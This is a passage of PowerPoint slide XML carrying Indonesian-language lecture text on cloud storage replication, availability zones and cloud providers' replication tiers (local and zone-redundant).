              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinkron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekritisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tinggi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Zona</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Wilayah-wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendinginan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> meng-host data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan instance VM di wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona dan wilayah juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> regional (juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> zona)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data Anda di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua wilayah. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
